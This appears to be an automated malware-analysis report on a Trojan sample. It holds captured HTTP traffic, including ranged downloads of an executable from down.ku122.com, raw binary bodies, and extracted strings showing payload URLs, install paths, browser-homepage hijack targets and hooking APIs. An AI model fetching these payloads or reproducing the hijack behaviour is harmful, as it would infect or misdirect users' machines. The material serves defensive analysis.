Set-Cookie: __cfduid=d204234301048b90900ff957776cd3fcb1492998343; expires=Tue, 24-Apr-18 01:45:43 GMT; path=/; domain=.globalsign.com; HttpOnly

Last-Modified: Mon, 24 Apr 2017 00:37:42 GMT

Expires: Fri, 28 Apr 2017 00:37:42 GMT

ETag: "4fadf1178a8b6c14524f2bbe490f7f182022faab"

Cache-Control: public, no-transform, must-revalidate

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 3545627f20b84e42-DME
0..........0..... .....0......0...0.......M........u....%...G..2017042
4003742Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.9.!..N...=......20170424003742Z....20170428003742Z0...*.H............
.d.....A:B/........;u....-h./.Az..W..7D..}....n.........."n!.4.s.j....
yCONa.kLB.=.E.r..z.'.........'.4.PG..<j.............R4%.....G...V..
...&.7b..^F.Z..2....N.{[..E.S@..Cp...m6..C..bB.......i.HC=.1....a.'.c)
5....-......9=W....(2\6V.....cHmTZB.k.........Q.3....K0..G0..C0.. ....
...o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-
sa1<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20..
.170213071103Z..170516071103Z0..1.0...U....BE1.0...U....GlobalSign nv-
sa1.0...U....2017021315051M0K..U...DGlobalSign Organization Validation
 CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C.
.0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.......
..u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V
..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~
..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U..
.....M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0..
....0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com
/repository/0...U...........0...U.%..0... .......0...*.H..............
=.. {.o...../...;[...!.._..3.......i{.."...I1....... w\...&..%....2...
4.....f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y...".2b....~.
..........E..U_..Y[....b.G'}..^-.....:.mo......=........)x..k....N<<< skipped >>>

GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDAqEDhBT4Lgi0Ijg9w== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp2.globalsign.com


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 01:45:49 GMT

Content-Type: application/ocsp-response

Content-Length: 1570

Connection: keep-alive

Set-Cookie: __cfduid=d17476f031ac0eefdd7e1102c438b28301492998349; expires=Tue, 24-Apr-18 01:45:49 GMT; path=/; domain=.globalsign.com; HttpOnly

Last-Modified: Sun, 23 Apr 2017 23:44:24 GMT

Expires: Thu, 27 Apr 2017 23:44:24 GMT

ETag: "1af051037518cde9e06027456ab73813cdee0dd4"

Cache-Control: public, no-transform, must-revalidate

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 354562a603a34e42-DME
0..........0..... .....0......0...0.......M........u....%...G..2017042
3234424Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.....S.."........20170423234424Z....20170427234424Z0...*.H............
...Qv.`op........XpR./3l..7...~....z@Z....i.tA .....z..\...6..X#.)..A.
...I....|..s.V"L..0[...{2...,.i.U[q.........|S.`.\:.L..3.{).~O.W.T-...
T...~.K$. ...pp..0#...../Z...@./@.b...Z.LSwhIl..#......2.....K....2m.|
....UF/...t.V(...i.D....(...NY.X..8P..(.U.........K0..G0..C0.. .......
o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-sa1
<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20...17
0213071103Z..170516071103Z0..1.0...U....BE1.0...U....GlobalSign nv-sa1
.0...U....2017021315051M0K..U...DGlobalSign Organization Validation CA
 - SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C..0j
..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.........u
..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V..G
..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~..W
b.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U.....
..M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0.....
.0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/re
pository/0...U...........0...U.%..0... .......0...*.H..............=..
 {.o...../...;[...!.._..3.......i{.."...I1....... w\...&..%....2...4..
...f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y...".2b....~....
.......E..U_..Y[....b.G'}..^-.....:.mo......=........)x..k....NS.w<<< skipped >>>

GET /download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe HTTP/1.1

Host: down.ku122.com

Accept: */*

Referer: hXXp://down.ku122.com/download/2345

User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

Range: bytes=86154444-

Pragma: no-cache

Cache-Control: no-cache

Connection: close


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Last-Modified: Mon, 21 Nov 2016 03:53:09 GMT

Accept-Ranges: bytes

ETag: "57869c6aa43d21:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 24 Apr 2017 01:45:47 GMT

Connection: close

Content-Length: 21538612

Content-Range: bytes 86154444-107693055/107693056
..5#,D.5.X.{<...U.I..B..F..b....?. .Ak.Y...........mt.#.]..@....G..
.......j...k.x.@-i..dt.......~` . ..]..)3:...9K.r.?>...'B.>}..~.
. .sG. ...a..5..6..........W>i.p.....}.#R%N._.`;.......E.u..].;.l.|
s..p.V..V[<.D>...`$..U.sR.n......LY....$..4. ...Pm.S!.. ........
........ .(...G.....q......s.....V}..D5fa......mr.<.0....(#.!....1.
[*..c....}Ep...y;.......%<....>.U........g.d..i..]...I.C(.8Y^;..
........kJ.m6....T.={"......|*...jt.;..Z....1..T...&..(.5=...KJE.5,..B
I...T.}....X./W.Y..W.%....L..N..B;.6.-[..Q.c....".............R..t..`.
..3x....IB.d.>>...<'.PN.f..._..8..E...J.%N.7.......#..H.....b
q.....k......o..\.m.F#..n{..mW,8..V.3.E.....,.e..Q/7q^u/U:!/..X.i'...r
Eo:kVB.......UE.~C...e...BZ{....c.yL.Y.2.8..>T'...k7mA...|/.z..V..3
.......KLd.|.........)..^.^B...P`>.&4...;.O.I....$~.....pk.rU..ZE..
..~b.#B....EqL.c..|.......,=3.\..C.......W<...gK.X."...}.//.=......
.v....o9.u..).Z""...17...t.;(......V(.....W.B..V..c..G.HH..8.2..~B..e6
....uV;..h!E....vm.. HzI.^x_.n.Vn.-..p.E..\.t....Q<J..........A....
..2`;...fZ4..2.r..'.....!..UT$S..=..q`..S..(..G.|..r%...{.d.....^A=..T
S........^d...7.qlZb.tb._...1._....R.3 ...f(..?../}..A....9D.X..gY....
p[..B.....(&.-.....!.!@.c.,.......?....?......}.(,..$..m....K?...Q...M
....L'~..)...(..>.#.HJ....{.....{...CH#R%.....G...]t.....w..[..Uc.:
.Z.d...G..y.^KEYL..<=.S..C........R....L.WO.D.._..LG........R.1...:
..N.).....J8...].....~..Z.<..4.aaHg.(...z...ek%A.Z.:..yD.=.b.......
.].2`.]R.%.98p.......tcb..a.iF.'.y!]N.8.k.e,[.%...8..11...cZ.Xr.t.<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: s2.symcb.com


HTTP/1.1 200 OK

Server: nginx/1.10.2

Content-Type: application/ocsp-response

Content-Length: 1763

content-transfer-encoding: binary

Cache-Control: max-age=418865, public, no-transform, must-revalidate

Last-Modified: Fri, 21 Apr 2017 22:02:18 GMT

Expires: Fri, 28 Apr 2017 22:02:18 GMT

Date: Mon, 24 Apr 2017 01:45:14 GMT

Connection: keep-alive
0..........0..... .....0......0...0.......WI.....L.c=...r..7Z..2017042
1220218Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...3
13..Q?.t8p.4@A.0........20170421220218Z....20170428220218Z0...*.H.....
...........o........WI..|.-.........~........7..Uy.....5.u........8.*.
,9h.uQy9... =[z.....4q...t..q.t...{.n.....a/........Y.|.F...s..J..._p.
..w.....?VMk..E.xvG.....\..=.&u...a..Z...)l.%.LK.C.2V.W.....C....mV.aN
..H..R.\U&...B.'.ai....~..j.l...... .m..F.b.U...<.!.......0...0...0
..........^..)......<...T.0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 Ve
riSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 P
ublic Primary Certification Authority - G50...161122000000Z..171214235
959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec
 Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Cert
ificate 50.."0...*.H.............0.............................m..|...
.....1rUZN.b.......t. d......O...NY.lR..k .Q.z.g.4(,...Rp.7...0C.j.)Z.
....... ~..3...x.b.-..... S^0<6...!.(..2}...T.fX}...6...(...1...#..
H..|`.yy.<B.z.q$......u.-..K.!......y..8..--....?.,.[.[...5.e.4....
.D..t.;....).J....\fV..G.........0...0...U.......0.0l..U. .e0c0a..`.H.
..E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...http:
//VVV.symauth.com/rpa0...U.%..0... .......0...U...........0... .....0.
.....0"..U....0...0.1.0...U....TGV-OFF-500...U.......WI.....L.c=...r..
7Z0...U.#..0.....e......0..C9...3130...*.H.............<wN..g..<<< skipped >>>

GET /download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe HTTP/1.1

Host: down.ku122.com

Accept: */*

Referer: hXXp://down.ku122.com/download/2345

User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

Range: bytes=64615833-

Pragma: no-cache

Cache-Control: no-cache

Connection: close


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Last-Modified: Mon, 21 Nov 2016 03:53:09 GMT

Accept-Ranges: bytes

ETag: "57869c6aa43d21:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 24 Apr 2017 01:45:47 GMT

Connection: close

Content-Length: 43077223

Content-Range: bytes 64615833-107693055/107693056
.....?...-.......J..v.....V..):....z.o....U..Z.<-.....d...v...(...3
.S.N=....#`W....}..nUi-^..W..o..P.#7..^.C. .h.a.uE..d.S.ei..........n 
.\...&D.t..fQ.SV..:.ko.8..m......L.p.c..0...f..9....... ..-.KrP......}
...&B......)e.\2..Nc.l...."&....}V*..h^..i.nE.G_.Dc.?@......d.Y.0.....
 e.|?=?..A.n....'.2'b0NN....tSQ..>.....E....D....tM..W ~..)L.U5K...
...#.....tw0.e^v................D.$.e..?...).qa....c.....a.k<c.V..i
i....q.......4.o30.5^.jl..4-..E..>..Y.......,.l.{F .".@Yb...fz.y...
g&..0.t.Z...x1..`......t..[..W..M6;gF,#..3)...<4.qw2j.b...xa...._..
...........znL.U...._..CW.......G._...[...."j.>..)....'_.b../...B.`
.Q.By...........x.R. <.j.q.o..8.8b...ja.(....[.)._.>D_.e......P.
@a,.....!7.kP.*....u...p{...(D..;.O,....xo...<.......'[............
.1..2..c?0......$c..-/..xS.8..?..........'...z~-f..\......1..g.y.zn..C
.' ....s*....I..._.Sz.(....5>Dy..X.{..f[....m...H............GP..BI
.Ax.GB.$..&..u.;8.iR@[.-X.V..$s..x3....E..".Z{=..S{].;.,".fZ..P.;5=...
.....L%.V.....w?\.G.j.w.....2..1b{.u".-@...!k?...k....SGK.1....88o.U..
..X..9..}.C1..4../..j}..&q.o.v.^..t ...~[W.r.`..0.:R.....(j..7..c..>
;.@H$.......y...^...=..E..r-w?....j.J.....yZ]u.o.......y'..`..!....3..
5..R.*....8..c`B....0L...X........N9.q.a..@....]..<.yD..T..!.......
:..u5.(I......M.....?B...hO.....4.ZJ.Z..g..i..v./.$.....`n...Ks.].<
...9.:....O..i.b-k..8'..C?.....8..4[;........p......rT..#...t.uU?..Y..
.......@.m...I...|..L.R0...f3.......!..I..zQ..=d...K../..Ja.I.8..[X...
.(`..J...Zu-..A.pi4........9v....&.O.JF.oO.6g1.|..}s...}Q.vI.a....<<< skipped >>>

GET /rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH HTTP/1.1

Cache-Control: max-age = 10800

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Thu, 13 Oct 2016 07:50:34 GMT

If-None-Match: "6b9ba9eca642c891cc02365fc6161341647bd9fc"

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.globalsign.com


HTTP/1.1 200 OK

Date: Mon, 24 Apr 2017 01:45:30 GMT

Content-Type: application/ocsp-response

Content-Length: 1518

Connection: keep-alive

Set-Cookie: __cfduid=dc4351f0e9fefbcca39f4481f0357a4611492998330; expires=Tue, 24-Apr-18 01:45:30 GMT; path=/; domain=.globalsign.com; HttpOnly

Last-Modified: Sun, 23 Apr 2017 23:57:25 GMT

Expires: Thu, 27 Apr 2017 23:57:25 GMT

ETag: "c928e2d374665088a12ae522bef2636fe56a734c"

Cache-Control: public, no-transform, must-revalidate

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 3545622f22844e30-DME
0..........0..... .....0......0...0......k...,k.....P....5..A..2017042
3235725Z0n0l0D0... .........W......#....*..2..1..`{f.E....P/}..4....K.
.......DN.BG....20170423235725Z....20170427235725Z0...*.H.............
....b...:..;.`.Q.....9.Gk^.nM9........./.!<..V..r..<$..dbt.]...Z
{ .....x...F.........-...........j......:d`...O..I..N...$p%f.>...q.
.?..b.<~.N.z..V24....7..c ]..Z..)v....R`....U.<.......'.....J...
...b,....?uQ..5.......y....cQ....~..../....7.....?..FpBBk........0...0
...0..........H...)....HP..A0...*.H........0W1.0...U....BE1.0...U....G
lobalSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA0...1704
07000000Z..170715000000Z0[1.0...U....BE1.0...U....GlobalSign nv-sa110/
..U...(GlobalSign OCSP for Root R1 - Signer 1.10.."0...*.H............
.0............f.._.M.g.d.z^\C@.F...p...VD..}.....v..9.....i..:m...H=.-
d.0#.|..J..S....d..Z.....a........&............k........;.[.7.........
Y;.7 K.........x;Y:LJV@!z...._4..w...,..A#.fb....)..$...5....?....M..{
O^.t.3.U.b..6H...J....o...g..!.."..{*.........O..2..J8xK........0..0..
.U...........0...U.%..0... .......0...U.......0.0...U......k...,k.....
P....5..A0...U.#..0...`{f.E....P/}..4....K0... .....0......0L..U. .E0C
0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/repository/0..
.*.H.............1(..-x.*.RwJek..S..Ww..C.....A...%...`.........Zs...p
.!)....a......2,......l.&.}...2..z..f....K.v.U\....9..~`.......h.q.Tr.
......h..z.U.RMO.,..H..,x&on.....P.f..[r...:.....wvS.J..mb..96P..SQ..(
..?(....y.:...e|..?.....5.uK$q......n...j.8.w......1..z...Fl.s...<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3676:

`.rsrc

t$(SSh

~%UVW

u$SShe

hXXp://down.ku122.com/

\Local Settings\Application Data\hao123\config.ini

hXXp://VVV.ku122.com

\Local Settings\Application Data\hao123\hao123.exe

.text

`.rdata

@.data

.rsrc

@.reloc

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

CCmdTarget

hhctrl.ocx

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

CNotSupportedException

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

mscoree.dll

kernel32.dll

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

.mixcrt

KERNEL32.DLL

GetProcessWindowStation

USER32.DLL

operator

OLEACC.dll

d:\code\zebra_proj\dt_proj\basic\Output\BinRelease\Hao123Proj.pdb

GetProcessHeap

GetCPInfo

GetConsoleOutputCP

KERNEL32.dll

GetKeyState

SetWindowsHookExW

CreateDialogIndirectParamW

UnhookWindowsHookEx

USER32.dll

GetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GDI32.dll

comdlg32.dll

WINSPOOL.DRV

RegOpenKeyExW

RegDeleteKeyW

RegCloseKey

RegEnumKeyW

RegOpenKeyW

RegCreateKeyExW

ADVAPI32.dll

ShellExecuteW

SHELL32.dll

COMCTL32.dll

SHLWAPI.dll

oledlg.dll

ole32.dll

OLEAUT32.dll

.PAVCException@@

.PAVCMemoryException@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCSimpleException@@

.PAVCObject@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.PAVCOleException@@

.PAVCArchiveException@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.PAVCFileException@@

.PAVCOleDispatchException@@

zcÁ

.?AVCCmdTarget@@

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

7%7s7

?$?(?,?0?4?8?<?@?

7074787<7@7

? ?$?(?0?

Thawte Certification1

hXXp://ocsp.thawte.com0

.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0

hXXp://ts-ocsp.ws.symantec.com07

 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<

 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(

.Class 3 Public Primary Certification Authority0

<VeriSign Class 3 Public Primary Certification Authority - G50

hXXp://crl.verisign.com/pca3.crl0

hXXps://VVV.verisign.com/cps0

#hXXp://logo.verisign.com/vslogo.gif04

hXXp://ocsp.verisign.com0>

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

n.aAHu

2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,

2Beijing baidu Netcom science and technology co.ltd1>0<

2Beijing baidu Netcom science and technology co.ltd0

/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0;

/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0

hXXps://VVV.verisign.com/cps0*

#hXXp://crl.verisign.com/pca3-g5.crl04

hXXp://ocsp.verisign.com0

\2345Soft\2345Explorer\2345Explorer.exe

hXXp://VVV.2345.com/?k5209809

\Tencent\QQBrowser\QQBrowser.exe

\liebao\liebao.exe

360se6\Application\360se.exe

hXXp://hao.360.cn/?src=lm&ls=n29ef8d0697

\Local Settings\Application Data\360Chrome\Chrome\Application\360chrome.exe

\Local Settings\Application Data\360Chrome\Chrome\Application\

anonymous@123.com

.exe|.rar|.zip|.gif|.jpg|.mp3|.rm

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

user32.dll

iphlpapi.dll

MPR.dll

VERSION.dll

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

[%s:%d]

Range: bytes=%s-

[%s:%d]

PASS %s

PASS ******

USER %s

E:\e5\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp

SIZE %s

PORT

User-Agent: %s

Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

Referer: %s

Host: %s

GET %s HTTP/1.1

HTTP/1.1

hXXp://

Cookie: %s

%d, %s

\\192.168.0.129\TCP\1037

NSPlayer/9.0.0.2980; {%s}; Host: %s

rmff_fix_header: assuming data.size=%i

rmff_fix_header: assuming data.num_packets=%i

rmff_fix_header: assuming prop.num_packets=%i

rmff_fix_header: setting prop.data_offset from %i to %i

rmff_fix_header: correcting prop.num_streams from %i to %i

rmff_fix_header: correcting prop.size from %i to %i

%s %s %s

Session: %s

Cseq: %u

%*s %s

%*s %u

CSeq: %u

rtsp://%s:%i

rtsp://%s:%i/%s

ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586

GUID: 00000000-0000-0000-0000-000000000000

[%s:%d]

User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)

Range: npt=%s-

%s/streamid=1

%s/streamid=0

Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play

If-Match: %s

RealChallenge2: %s, sd=%s

Title: %s

Copyright: %s

Author: %s

real: Content-length for description too big (> %uMB)!

Require: com.real.retain-entity-for-setup

SupportsMaximumASMBandwidth: 1

Bandwidth: %u

Challenge1: %s

hash output: %x %x %x %x

hash input: %x %x %x %x

stream=%u;rule=%u,

Illegal character '%c' in input.

%s,%d

%s.lnk

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

GetWindowsDirectoryA

WinExec

RegCreateKeyA

RegOpenKeyExA

RegCreateKeyExA

GetViewportOrgEx

ShellExecuteA

SetWindowsHookExA

CreateDialogIndirectParamA

InternetCanonicalizeUrlA

InternetCrackUrlA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

UrlA3n

.evsb?

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>

RASAPI32.dll

WININET.dll

WINMM.dll

WS2_32.dll

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

ntdll.dll

%s%s.dll

@%s (%s:%d)

%s (%s:%d)

accKeyboardShortcut

@comctl32.dll

@comdlg32.dll

mfcm80u.dll

MSWHEEL_ROLLMSG

Chttp\shell\open\command

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

\Internet Explorer\iexplore.exe

config.ini

\hao123.lnk

\config.ini

\hao123.exe

\uninstall.exe

Software\Microsoft\Windows\CurrentVersion\Uninstall

All Files (*.*)

No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.

#Unable to load mail system support.

Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.

Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.

Disk full while accessing %1..An attempt was made to access %1 past its end.

No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.

1.0.0.0

Hao123.exe

VVV.xxm4com. All rights reserved.

1.6.4.10

(*.*)

2012 - 2017

%original file name%.exe_3676_rwx_00401000_001D2000:

t$(SSh

~%UVW

u$SShe

hXXp://down.ku122.com/

\Local Settings\Application Data\hao123\config.ini

hXXp://VVV.ku122.com

\Local Settings\Application Data\hao123\hao123.exe

.text

`.rdata

@.data

.rsrc

@.reloc

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

CCmdTarget

hhctrl.ocx

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

CNotSupportedException

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

mscoree.dll

kernel32.dll

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

.mixcrt

KERNEL32.DLL

GetProcessWindowStation

USER32.DLL

operator

OLEACC.dll

d:\code\zebra_proj\dt_proj\basic\Output\BinRelease\Hao123Proj.pdb

GetProcessHeap

GetCPInfo

GetConsoleOutputCP

KERNEL32.dll

GetKeyState

SetWindowsHookExW

CreateDialogIndirectParamW

UnhookWindowsHookEx

USER32.dll

GetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GDI32.dll

comdlg32.dll

WINSPOOL.DRV

RegOpenKeyExW

RegDeleteKeyW

RegCloseKey

RegEnumKeyW

RegOpenKeyW

RegCreateKeyExW

ADVAPI32.dll

ShellExecuteW

SHELL32.dll

COMCTL32.dll

SHLWAPI.dll

oledlg.dll

ole32.dll

OLEAUT32.dll

.PAVCException@@

.PAVCMemoryException@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCSimpleException@@

.PAVCObject@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.PAVCOleException@@

.PAVCArchiveException@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.PAVCFileException@@

.PAVCOleDispatchException@@

zcÁ

.?AVCCmdTarget@@

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

7%7s7

?$?(?,?0?4?8?<?@?

7074787<7@7

? ?$?(?0?

Thawte Certification1

hXXp://ocsp.thawte.com0

.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0

hXXp://ts-ocsp.ws.symantec.com07

 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<

 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(

.Class 3 Public Primary Certification Authority0

<VeriSign Class 3 Public Primary Certification Authority - G50

hXXp://crl.verisign.com/pca3.crl0

hXXps://VVV.verisign.com/cps0

#hXXp://logo.verisign.com/vslogo.gif04

hXXp://ocsp.verisign.com0>

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

n.aAHu

2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,

